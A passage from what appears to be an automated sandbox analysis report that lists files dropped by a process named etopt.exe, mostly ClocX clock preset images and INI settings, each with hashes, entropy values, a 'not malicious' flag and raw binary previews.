Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFFF ;cut window by this color (default red)..ShowAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x00000000.;color of AM/PM indicator..DateColor=0....HourColor=0x00000000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000FF ;color of second hand..SecondLength=55 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=63 ;center point's X (default image_width / 2)..CenterY=61 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\AquaB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30483
Entropy (8bit):	7.932354142916476
Encrypted:	false
SSDEEP:	768:3fQkIoTw9vw5VugTvrBRCKbhNE3uJJD1GYP71q:vQ6CIVuGTvhbLE3iYqq
MD5:	73E7B2F60F8AC6FDE449861AC5484755
SHA1:	FF314467B04E04A70C2BCAF2C5E65C1C7B5D9274
SHA-256:	81DC5E6439F08EDEA70408774E1195FB2D01BE1AAE88B0A157EB7E8BC342DDA3
SHA-512:	EA9A4C1A3F9897AC96D3A3111F6F1D5BBC32EDAE25B4D69FD47144E5FE5970823C3FCF81D45EBB950BDFFB16CFA5CE0963F220F08BBF942A0BCFCAA025A0CA64
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..v.IDATx.b...?.(... ..........D...=............bddd...@..H3A.....@....3......3..33...^.bX.l..'..b......b....faaQ.F...........-...$.L..@6.01p...131..P...?...H~..O@......_.....m`.x.....-{....a.n..4$K.>>>..N.&6v6...Fs^^^.A.Ac`...#......._..}.{.......3032C. aF&.&&Fxb.a.9...........(....>^.~......~...LIi.._.~.......>......!..,-,A.....n.......3`...9.........A.....e...?,..fb.E0...'.&pB......D...........33.L`"....\|...;{z.zO..w..80d.. ..D........uvr........:0..A....,...H.. 1P....:(.Ab....rPdB.A...L.H.I.0........@9P....4(..@h`"..L.7.....n^.z..;w..". ..m....g...Vt.s........3....?...#......e.../.? ......g.dm..?...~.K.?..@."%.P...y......XYY..X..........889.lH..1.?.f..eaa.'$.~X).2C@@......\|.r..]...\....;w.e8..`..q...(.. 1...p..I<........Vx.m,..f.a....p...j.1....8.......D..4.-.......a......\|.....0..Z.c..W...J5t}.....[..N....0........Y.!^.H..I...@.A.....A8

C:\Program Files (x86)\ClocX\Presets\AquaLarge.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	46620
Entropy (8bit):	7.961746017021179
Encrypted:	false
SSDEEP:	768:Mfbx5EU99lKeGQVYgofZgJTe1mY3FABwXRfrd5Z3H0Yzf5VrZmX:Mft7seG3g5e1mY3EwBR5Z3Hnj5VtmX
MD5:	FD4E0D5D5A8A964E2B25D1CFEBE5A4A6
SHA1:	CA0A5D1F4D0D7910F6677113710278C766902AB1
SHA-256:	2DEB821546723BA504DC12614B388CFBCCB785C74D7C5EC04033E66642187771
SHA-512:	8EC6DC56990120818357C0ABB7C1F95AE5E5108BC8B3D3858236E42FCB0B84CE14D1F322C298AB8B242575F00E5B9D5764570D8FA9326F8EAEB3B306A91B5AE0
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................^....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(..C.....h........q4.(.3J..?..(....h4..........R.....,.r.,.2L.L.....@9Q _.H..1....'#.#;........'.......d.....{..k .%........?......3.gH...h.....h4..%R.ajj.4e..].v...V.M..&0Q....0.#41.S..0......2F& .5x...... .........m .....~.....\|........O....8.o0...f.l...L..,,,..L.z.H.........B. ...HJ.D.I.............. q....#%n ......@.....i5..SP[Gt...@.#....v.Z.yyy.fffk&f&+ m.L..r.}d.....0q..%.. .?.....0[....?...$~&&fp...%``..'`.. .d.........l.#8A..&.S@;..."G.<xp.....Z..... ..GR.]0o........u.&.{`B.B.... .4,.2@.)...JC............Xbd.$fP.........a%6..\......R.o.@3...k..\|...?..^.......HI....8....}..999.....HLA..n.B.)..&FP.........f.r.....9..p...JX01H......Nx....D... ...'Z&hBf..L.......Q`..X2..v.w...}........p_.7..0..E<2......kh.D....Vg......i.V....y..`....1..:.c.P....PAK..BP.sQ.}....A...c...& x.3..`.b..4..O.m.....#..j.....}#..gJ..{...[.......A.

C:\Program Files (x86)\ClocX\Presets\AquaMade.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	27995
Entropy (8bit):	7.902628308729259
Encrypted:	false
SSDEEP:	768:xp4+24RPlPmseLV72TgAUjwVq16Z9Xd12XIVVL/wUjJ5Vq:jpHheh7fvjwV2m9X2O/wWJ5Vq
MD5:	9AAE18427A5BF4B00F9BA4A58AE01A05
SHA1:	4D59CE4542295D5C2E5B9A9325C6191C3AE25FE7
SHA-256:	0DC9ADDA1AC844E4A8C3D5A9033B2EE35D1AFC81988FAA155E88308AA16D9499
SHA-512:	73CF29E377DECC34A31D5824E43EDD6050BBBFCF4DE8A33AB423C15122F6D7B93B7A3F7E7FBB3B3C9E1BB1951DE834D80FA69A02931546C9A1CCEDD8328009FE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..l.IDATx.b...?.(... .X..g....9T...E...Y.(.....bI [...I.H.310q.i..F..F..?@..@.7........H...32...T..?.?.~.:.e...,.....P..............##..##..#...0)..=.O.X....#..".8X......,.....7......]....7/...tl.......hH%.`.0....3...12.X.....Y.........)!0 %.F.........L..LL@6X.l.E ..?...................@.>...u-._I.Vv7F&f'fff;..<...E3.?.....A....`..Vb@..H..2..`.$.&x..bf&.f&X......>......?w....PH...4(..#$[2j...311{.....Y.[..#.....#.\|.8.9..V........@..............X.a...d..`......m{..;.q...i..4...4.........\|. ....7.9................G..p.....J{..V`.....(.Y@..............^:\|....V`.a........l.. ..E..E..m@.#3k(0....c..K.G.x.....~.f......@../._..........?H..M,.L..u>.X..rp.f.D,.fae.cHi...%...f..!U.0...03.fa`.&...0.7....w...b0%....;..@...qYP\|..x.......W..0V........K\|.?11.^...;.f..)...g..n.Z}[.....M.......N.u4to... .G.1t4@...a.p.J#;..L....[m.L.k..2.).....\/...R.*.t.M..>d(z.r../u

C:\Program Files (x86)\ClocX\Presets\Aqua_Apple_Clock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 100 x 122 x 24, resolution 2834 x 2834 px/m, cbSize 36656, bits offset 54
Category:	dropped
Size (bytes):	36656
Entropy (8bit):	6.288881463678386
Encrypted:	false
SSDEEP:	384:ovrz7c5apfURSGfJJsvMOO7WOhc4tHwOormPeJ7bEnb6f1ofnpapYR+MqV0yT:AZUzVOO7WODtHwOormPPU4nhuVfT
MD5:	9AB412A79776C5575EAAC0D8CB36C294
SHA1:	B8BD1945591A00235F5C8C80076F7B54C421AE4C
SHA-256:	093E1350402900EFAEE414D0506425A690A4EABCFD77A78A1979B2E072FDB083
SHA-512:	D6BB2EA1A8AA4200B054BB7FF65BE4535D57ED7EA3531C2802A116D7FDA0EB53134170BAC32993EA1E43B08BAF879967920C4AE6DA023D625AE92219770B89B9
Malicious:	false
Reputation:	unknown
Preview:	BM0.......6...(...d...z...................................................................................................................\|\|\|uuuppplllkkkkkkjjjlllooouuuzzz..........................................................................................{{{vvvqqqooommmnnnooorrryyy................................................................................................................................................{{{tttoooedd_\Z\ZY[YW[YX[ZZbbbeeeeeegggjjjrrr{{{.....................................................................}}}uuupppnnnkkkiiigggeeedddeeefffeeefffjjjsss.......................................................................................................................................\|\|\|ihgjbZygV.jR.lP.kO.kO.kO.hOycOl]O`YQYXWccceeegggmmmttt~~~...................................................~~~wwwssspppiii`^\f]Wl_SwdR}fR{eP{eP~gRxbPh\Q[YV```gggkkkuuu....................................................................................................

C:\Program Files (x86)\ClocX\Presets\Bahnhofsuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30183
Entropy (8bit):	7.905187050462904
Encrypted:	false
SSDEEP:	384:iJ7Z3xRpqfyMY75H8OWTuMcSVp4yiuNtv9lPadvB5iAR63e0MHAFq/zVIe+c9NAD:OZ3ReyMgFsuMlHFP9lyF7vkqOtwrY
MD5:	194E941B01069DFD6ADAA0EAE5133FD0
SHA1:	320DD2E272DC6AB8F96C837262E2AE13330F50A7
SHA-256:	02696689D1EF5B7C77CE40C439CD6D9BE7F4ABDE14B59F52297CD113955B6947
SHA-512:	727A6C4142D8E1FF0D41D16BF704448303B1DF2DF00EEBCBB1E888C09D2C2043518EB828FAA3006A3D71ADF914EF6B1CF2EB70D5F7C4F0C2B7408DDAD6424CBA
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............P....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..u]IDATx.b...?.(... ..F.`....h"......2.=... ..f@....$.+.?..O..b.F......lf46...&,........P............. .X.x.gF. ..zyy.YYY....*......Kqpp.333.....i. ....4._ ............?...?~....../_.<~....C...=r..;...@....%..H.c.%...b...E....a...RuEEE.>>>]...Mnnn.`..#...D....!....FVVV........4...?0..y >010@....LLL.......(.........^.~...So...B..`.c(....4...4.a....zzz....6....H7.F.>P.... ....ap$....`...Ps...R.d.\..N......d.F..(.......q.....M.v....A..4A..bp.... ..]"@..."......,%%...t+`..r7rN.E ..r=4..l.<r..".V".h`5.....(@.$.K@0;a..@b 7....w...s......@..@...(~#....t...A...r=... ..>..T.......w...V....A.....`E:........o........>\|`...+...g...;...Y........P...Y.@3.r.......\..yyx....1...1....IIJr...6.....`%.....{......<.k..w..~...H%..T:..`.lr...(.t.I.,lM....x....q....#..X".P.W..7..I.y..s.L......"..1.(.<.!..q...X......E..E..PU..Y.Q@....\|.fD...M.......@...

C:\Program Files (x86)\ClocX\Presets\BaiWeather.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1538
Entropy (8bit):	4.912643629219799
Encrypted:	false
SSDEEP:	24:BEZrGXE5lr9BxjTJaKhVY/hTOLX01rfXkpFdGIo85bifKzo+ibQ0Wd9iBxLuQI:BkqyllTJfgt+vdGJszohQJTiBxLvI
MD5:	D4F3C4B3EE12CDDFF6A83E9AAA565B3D
SHA1:	696F89C01B34E6DDDA7035ED179A8CBB4D7043D9
SHA-256:	73DDEBF290683CE599E79003F95A804E17498ED4403D10CDC8B2092B4308A4C9
SHA-512:	72C3CDC6045DDEC39718951AF431989EC88072458605570C5630BAA9D34A2A2FA917542F8CAD785C09AA642624C086A64DF1366D2FE2E91F79BF6571D7294376
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=88......DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12..DateCenterX=62..DateCenterY=45......HourColor=0xCECECE ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xCECECE ;color of minute hand..MinuteLength=56 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x18c7f7 ;color of second hand..SecondLength=57 ;length of second hand..SecondLap=20 ;overlap o

C:\Program Files (x86)\ClocX\Presets\BaiWeather.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 161 x 161, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33642
Entropy (8bit):	7.9898594034987465
Encrypted:	false
SSDEEP:	768:0+BKTCFpP9wB4YZfKoAf8qzfc9XIpV8JzO64:0CNwflfA0Afc4X8JzC
MD5:	796618351AEB1C80C1FEF6579990FB9F
SHA1:	896ADF790D7FAB3E97079C4E5CB461A45B821AD3
SHA-256:	CA04C21BA94D6E432C436A26FEF81609AA40C783462624CA191DB9710FC84750
SHA-512:	21BD6661731B0481602D6A8D5985137EDA95648FF87A11187688853F899E352EEEA12CF8EC70460E2930E10E85FC84E569B5D5656FC038D8359FEC72791AC7F3
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............Q....+tEXtCreation Time.Thu 7 Oct 2004 18:56:56 -0600...{....tIME.......]......pHYs.................gAMA......a.....IDATx..{.eU}..k?..>f.sg.y..(.Ff..."...i@..iM.6`c.....?.?.........m5E.Tic...DE..2#`G...}...k..[..........=.s........w.u..f....................pEG\T...l&.D&.5Y.r.-v...R..JW.T...W^p.H6?......4....3[]eO3R..Z.U.1.iWV..Y....Z1.J....:.`.M.0.'..Gk;......;.?.........ZB...\|'>2Wm......q;....fK..CUX....V. ..n....A,AU.?.4"U..3s..Je...@.h...p.k.'..R..U'F..5..3u.>: .[i.};..p`b..M....._...9.....r.\u..(^W...b.eU.;.TeZ...'..4....lI&.$..&......8.C.H^.b...v.v(!.Z...JR.R:8.S.Y...%,...N".L.H..z:..X:.v(e5..$...v....V..}./n.q....~./.......o.O?.-U._.l.;.ewg..p..L.......".,.qa#a.K....".r.^.."...r).9..^....).6...b......Xr..B4.....PL..JP.%......ZJUK.8...~.n..;..............{...._V.:....O.Wf.....//..7.t.....I..@V.\|..VQ?.....)...(j..J.:..1\|.RXT.:B3L...\|5.gr...A.-?7...m.x.C.."......:.%....$l.2r.....&}g....i.C.-."q..4R

C:\Program Files (x86)\ClocX\Presets\BallClockAmber.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	6.83338253674313
Encrypted:	false
SSDEEP:	384:Ds2SUYkFxoF79oRKLcX/uWL8Owlk75v9h2y/rrftfLDdOKVLB0lGuRsUxlIB:g2YQXRKL8/wM1Yy/rrftjPLB0wuRsSIB
MD5:	13B2CD8AC7C2041757E7F8133F3615AC
SHA1:	421F8E88710E56BE792B4E2C5CF7B80F2DF9FB5F
SHA-256:	C07DA73ED598A9E0C3064791984360B211031CAC9B42A42EC50C1EB7E5C12B3A
SHA-512:	C53537E84E7C9560EA2BB963D696B18A968A8F94D764C46A52E6E3419F0AA8628DDC315C185D0F3799D6585F15EAD807B125BC708CD393FE4402BF0D831DE2A5
Malicious:	false
Reputation:	unknown
Preview:	BM.}......6...(...h...g...............................................................................................................................................................................w..o..m..j..j..l..o..w..}..........................................................................................................................................................................................................................................................................v..i..b..\..[..[..Y..W..X..W..V..V..V..V..V..W..W..Y..[..a..h..u............................................................................................................................................................................................................................................u..a..Z..Z..[..[..\..]..]..]..[..Z..Y..V..K..@p.V..W..Y..Y..[..[..[..[..Z..Y..X..X.._..s...........................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockAmber.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18400
Entropy (8bit):	7.856496562747338
Encrypted:	false
SSDEEP:	384:5td1uc5PdIUsIhMmNNRTHzhTjXQKnZVwIvXTY4XhP+e/Tsjf:fdooNlNAmLXZxP+eIjf
MD5:	C0B3CD6A12D50F9CD681BBAA03015423
SHA1:	DB1EF651280D3B37A279D1F56BEA4959563BD46C
SHA-256:	A7AC46F2D7C9FEA9C99F356A18D4F3D4814DA0D93584209C69E8BE36BFD600CE
SHA-512:	BAAA73846A66D7F28C7167C8E57F2B122EBCEB772A09B01984E151292626A469126003DDF707A342E760D035C304C3371A5E3ED890E28BC66D5679071F53D45A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..GVIDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........".I..KG.AJ..A...A...A...A...A..@..?.N.J.h.....w ~..?........p..o..o.3<.......H..C.d....P.`.t.g..c.S.b..ec0`cf..F....#... P..L......?..W.Dq.._...1\....K...".=! ...........pE<..1(..3.p.08.01.../..g.W..}........~.'%P0p.)30q.0\|{r......zT.......g..a8..#......A..... ..c.@.x&...+.........`....7...~ .O.....[..~?.......p../..v...5M...{....0..O(0....._.1l...a.....`K..q..@.)....RK.].>.pN..@.3...j."........a`....AM./C.Y.......R..jo.gfx...A_.'.g`..~#. ').`.u.\2.GD6..J.@.g@{.?....8........ ..C......f..d0..fH`ca....b.tF.H..p.J2..+2.I.1.J(3p.0...3..Z%"!.o..P^R.........p..i.]M5.f.....}cX.r.............d.....W..............?.........._....g8.L...SB@.s..b...=...g..x.`......FH...h.G>..q.2.).2.i.0.jX1..j1p..10..

C:\Program Files (x86)\ClocX\Presets\BallClockAqua.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	6.731943420864348
Encrypted:	false
SSDEEP:	768:Hc0SD1wzFxbmt9DT8vkbZKHrI2mmLyKBRygYK0s:80w6ZiSVlbyKBbYo
MD5:	25F334F4A79DAD4448C324BC0200F02D
SHA1:	306892204CE74FC72E197788E4ED03270574E889
SHA-256:	93C5D3A982E8BD1E17579D41A833155E5BEC92FCF2063D6E14B9F7E8F6FE4613
SHA-512:	04FD745EFEC76FD83356C3F7EE7DFB6676E966FFD80EFF7C1E86784B4D0B08530052E0C8CED07BBEAFD114C410A21484E34CBBC31B84B7746E4DB8B17962AB39
Malicious:	false
Reputation:	unknown
Preview:	BM.}......6...(...h...g...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................x..f.....................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockAqua.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18528
Entropy (8bit):	7.8611486566871855
Encrypted:	false
SSDEEP:	384:5DR08eJq+7lRlGCjOa1tplFiea2xb5xa3y7q28T:QXqCj/1tplkyxdxUyW3T
MD5:	31ADC20E79C6F0B4B4BD624C4960A24E
SHA1:	0DD73A3A8B5E8FEA8AAF86DF4EF8EF608EAC411D
SHA-256:	01EF0594D6B5E5E5C3C02475E1096CB9A307C40E167DD26D11BFE352C458BC08
SHA-512:	AD204A9088438012195F5AC8E1DF9FE78C3EF7416D8F9D36A5CC41998F57A47F7B3A47BAE7444EB70C7FB73726154985042F0A84BB350FDCE49CBFD83AE9B131
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..G.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........".C..U.P..KT...W...M...E...I.....c...d.F.. ...2..3.{....c....0..\|....~.<.....H..C.d....P.`.t.g.6H.c...fb.3.F..##...#...S.@y62...L.....{....;.Dq...O.~..q....".=! ...........pE<..ZT(..(.0.r;02...= ..g._.32p..g`....'RR.......7;...?...g..G...j_......._...p.....wqD..L..q..@.1..G<.zNg.0tbd..cdb...p\...SHl..y./..2....dbx.G.(..V#.......l.......3.b....?B.....?'.............[B@.s...L..o...4...3.p....=..P".......X..>..$....d#.?.....[..&...30~{.._....../.0.J)0<.q...$.....8.q%.......m....W~:.py.&..8......pF<#.'3.M....T.#.....G.........`......A\..AN..AY..AQ..AV..A......O.)...'K...r...(.&&&.3.O1.j..mfc...?..U..6....^0....N.;.>1<~.........&........~n....OG.......`J..q..@,...g...L.6.:,.J......qb..L....de..g0..b0

C:\Program Files (x86)\ClocX\Presets\BallClockIce.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	5.985389961863382
Encrypted:	false
SSDEEP:	192:DZ8oIe45flGoS3iItFTeQsHyXw7Hmyak1v+1fveN3e9Iy6CGCMV6JgMuutekplCl:DFRSItFaQsHyXw6kIqD0lwhI2uy
MD5:	6C0B705BDE7D2AFE37253E45524B729C
SHA1:	46BBAA392E19944FA0DC67A867D6BAB5C5FABE8D
SHA-256:	C0E1C4843953607594FA2D32CA85BD516D6BF19FDAC0C49F6D7C71702DEC57F1
SHA-512:	BC0F736ACA104903F6AD106A2875202B64C7A112B3F055AEFBE293547F93FB784E765B94B4A0571011E722162B7C4A5EB75A2FF4AB122BAB4427D3F94F7D1266
Malicious:	false
Reputation:	unknown
Preview:	BM.}......6...(...h...g...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................HHH~~~...lllhhh.............................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockIce.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12805
Entropy (8bit):	7.853853054587897
Encrypted:	false
SSDEEP:	192:WSOYiiwKNMtJKMvHuOoOHZofl5rndayVeTtVUEilpFe7mfWq13L3wHR4dv3O9THx:5Y6WnjHZoflxV634FKGWW73eSdveIkz
MD5:	7341D4B09D1030D1CECEA62EDBD8DE93
SHA1:	060A6A44ED3C889908824ED64B31888EE65DCA7F
SHA-256:	89A25A2C8D5A5B26F1C3749282AE1FECC42B690219D985392336747FE1A550FB
SHA-512:	C2AC9391085B96E8CCE8A0F0C76B3817034B25B0E7D5F353A72CE92D30BCBC63D38D0844B25A82F5FA4390077FC5E3E4F0EF993FF9A8B6BC16979E618AA93F17
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..1{IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........"...KKSKJHHH...K...U...Y....]....H.......w@........}..o7.{....k...>...D.9.J.....%..HG.x...1%%%m....`d..#Z...I..'A.<..v..........&.;.Dq../...wu.....".=! ...........pE<....)....prr:....../..g..a..>}.. $,....W.6V6...}......F&F.^.^.`.a`cc..6.....=.......<>2k..8".P&..8.......#..=.kii9..u?`.[@s8........./....2p.s0.Y.....AWW.,...+../^.c.?.....<}........,...%0.....`u...k......[B@.s..b..9.%.ssru....988...!.+..1......?~0.K...7o2....s9.\|...ABB..h>8p@.lfHKMc...f.V....a$;..U.'??.....3....O.>]9y.....gDK......@........f...1...K...>@..b.tP.!G:(..................,0.......PWW.....N...g...f.....>u..CFF...s..x....A..?3.s9J"...6.....,q..K..S.N9.Lx..S...f..b.....K.3.s....l&0.....-..".TW...3HJJ2H.K0...0......7.u;....

C:\Program Files (x86)\ClocX\Presets\BallClockRed.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	7.056071030869739
Encrypted:	false
SSDEEP:	384:DM7J9t2ORX9hUmbPtJ4T9oF4UeMPNShuK/3mNvQTgUX:w7JPX9hFnoiF4UeMFeum04Tgq
MD5:	E26AD55938AE56FEB11B2450A5A02B0F
SHA1:	5436A23577C3F33038963C8F44D8BEE50DD5FCCF
SHA-256:	0FABBE61F9E6638B396FE35F2A02CCAB1AF7D2DE40E284318565B7983FD58408
SHA-512:	E07EF075F6833C193412F41F0F5B235E76759FDD70CC8126FBC68BC3689C369BFDE7795356D7A6EF826C70F57AA879A6FC698EDEEC41D6E234D006F647CC90AF
Malicious:	false
Reputation:	unknown
Preview:	BM.}......6...(...h...g...................................................................................................................................................................................y..w.~v.~v..w..z..................................................................................................................................................................................................................................................................................}y.xt.tp.tp.un.so.sm.ul.vk.vk.vk.vj.vk.rm.rm.ro.sn.so.vr.\|x.................................................................................................................................................................................................................................................us.rq.rq.tr.ts.ut.vu.vt.ws.wq.xr.wo.zn..p..sx{n.xo.wo.vp.ur.ur.ts.tr.rq.qp.pn.pn.rq.............................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockRed.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18975
Entropy (8bit):	7.848170374392596
Encrypted:	false
SSDEEP:	384:56UKEwcqBzASUGvcXbSSnUWCi6WExgCY9vgHA:Av8qBzAfGvcrSSnUX3XK
MD5:	48C63E4358B3C3747F617A6B636ACD74
SHA1:	E22EB43B6E4EB4BD758BC3F8A07CFD4589A2B616
SHA-256:	80D565FDEDC4640C7F0C1086B53B0741449770899122EF1E4BD718CED53F2523
SHA-512:	942AC646B29303ED8CB73153466AB2480B48959A484E831CA3AD7FF77EB01E16ED1D2EB5150BB9AEA0B095DB3396896E91F1F1E1EE4C75A7362A731840387B85
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..I.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........"...K..YJ..Q......#.....,...8P.....H......@.............p.+..w..?........#".p.... ..B..-..#.1..]L..I......Q......b@IA.<..v....{`.x......../.a.....WW....)....2.1.K.......W..q....,#..'#..0+...%...;#..\|...@..>.B..!.&.eu.F>.....20...V.9W..(..........x...Y.~.....2! .9@.......L.9].............=......0...a.X3.A..^.........y8.c.C.&6v.YIN.....o.......3P..L.'.............[B@.s..b..9.%.s.8t....9.....R.".[=....y....1._>..6.'.0..0r.......2.g.`0.5..3...A....~......f..&....j. ....gd..`fyf......+'..q....-!..v.@.....g.s002.s..12&.10...y.c...\|&(..........<...*...".........O^!.A>...r.....B..20.5.z........w.?_>3......C..e.,..2\|.{.....^........T......W../............9....e..z&,.....l.g.#>...k0r:..Zg`..a...a...d

C:\Program Files (x86)\ClocX\Presets\BigBen.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 254 x 254, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	52018
Entropy (8bit):	7.988592195271539
Encrypted:	false
SSDEEP:	1536:ycHNm1xLbHcKpCtCvfMw3kGMZ2Bc/p8Xp:Ftm14C30Gw2Bc/p8Xp
MD5:	20F7051C41230A7C304AE9FCC2B1672A
SHA1:	6F601C41AC367325375DF553EC8C3E2907A4A6EF
SHA-256:	69274CC505982E37F5CC1CF478775E4FE5CECE83AB1C836E924C4FBC702391CF
SHA-512:	8ABBA59074E457AD058564B37A879474E5DD7BE2C5B92C5534FC0B87E8112D7F7C0B1296056BBDD5F15F73B7E556618FCBAFEC8D059D5AC95685122EFBE0A6EE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................Q....tIME.........'O....pHYs..........iTS....gAMA......a.....IDATx....]gu...rz/...F..l..q.`0..@.@..Br...~o...7......@(...W....l,K.z...9..}v.k}..kb.R.l.,=.9.Sv...U...MiJS...4.)MiJS...4.\|..\.@S~1r...N...J..Je..b.ZQ...0..2l(.....o..p$.D...X...8.6..S..l........@.<.y..C.8u..,.Z.eMG.V.^...U...jQ..8.m...B.-X.N.k0. \|...1/B!..I..:..r5z..a.%..C.h..B.......9...N...;w....n..p..t+R..b.."..ZZ"H%..(".... <..L9... .K0....Tr.1?=..L......Y.J...9.."d....m...v.V.l..)...x.H.....{..;.......p..)he..d..G.`.;.X..Y.d.X\B.e...~.t=D[..`.....K.>.%.a....@..C1_E...azN.33..9C.......^.."%...-qgrz.V.eS................?;._EG".B...X.q.b..fy....;..r..../p8.\].]...[...Z....w.\|....q..A.6._6.......g.b.@..X6[(..4Y..V......G>....b..cHE.p.a.Z..N..n..E..4m..`g...9...\.6.....T.G..O..}.o..o...r.'[;..S8zp...<...)g.U...m.v.w...\|....B.R]....x.I../3.?.m..o.......uW^...;..-..._m....$\.2..T..6@n._+...f.{.&.k......^...g.........[0.1.;^.=.<.@..]....-k2..

C:\Program Files (x86)\ClocX\Presets\BlackAppleClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
